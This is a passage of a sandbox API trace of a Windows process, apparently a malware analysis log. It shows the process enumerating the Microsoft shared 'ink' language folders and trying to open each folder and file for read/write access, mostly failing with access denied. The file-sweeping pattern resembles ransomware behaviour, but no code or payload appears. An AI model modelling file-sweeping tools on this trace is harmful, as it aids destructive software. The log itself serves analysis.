dwReserved1=0x77892bc0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0085.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0085.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.453] AreFileApisANSI () returned 1 [0085.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO", lpUsedDefaultChar=0x0) returned 57 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.453] AreFileApisANSI () returned 1 [0085.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0085.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 57 [0085.453] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.453] GetLastError () returned 0x5 [0085.453] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0085.454] AreFileApisANSI () returned 1 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO") returned 57 [0085.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.454] GetLastError () returned 0x5 [0085.454] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] GetLastError () returned 0x5 [0085.454] SetLastError (dwErrCode=0x5) [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0085.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0085.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.455] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.455] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.455] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.455] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e90ce26, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e90ce26, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e90ce26, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.456] AreFileApisANSI () returned 1 [0085.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.456] AreFileApisANSI () returned 1 [0085.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0085.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 73 [0085.456] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.457] GetFileType (hFile=0x334) returned 0x1 [0085.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0085.457] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.457] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.457] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.457] CloseHandle (hObject=0x334) returned 1 [0085.457] AreFileApisANSI () returned 1 [0085.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0085.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 73 [0085.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.458] GetLastError () returned 0x5 [0085.458] GetLastError () returned 0x5 [0085.458] SetLastError (dwErrCode=0x5) [0085.458] GetLastError () returned 0x5 [0085.458] SetLastError (dwErrCode=0x5) [0085.458] GetLastError () returned 0x5 [0085.458] SetLastError (dwErrCode=0x5) [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0085.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.458] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.458] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.459] AreFileApisANSI () returned 1 [0085.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL", lpUsedDefaultChar=0x0) returned 57 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.459] AreFileApisANSI () returned 1 [0085.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0085.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 57 [0085.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.460] GetLastError () returned 0x5 [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0085.460] AreFileApisANSI () returned 1 [0085.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 57 [0085.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.460] GetLastError () returned 0x5 [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] GetLastError () returned 0x5 [0085.460] SetLastError (dwErrCode=0x5) [0085.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0085.461] InitOnceExecuteOnce (in: 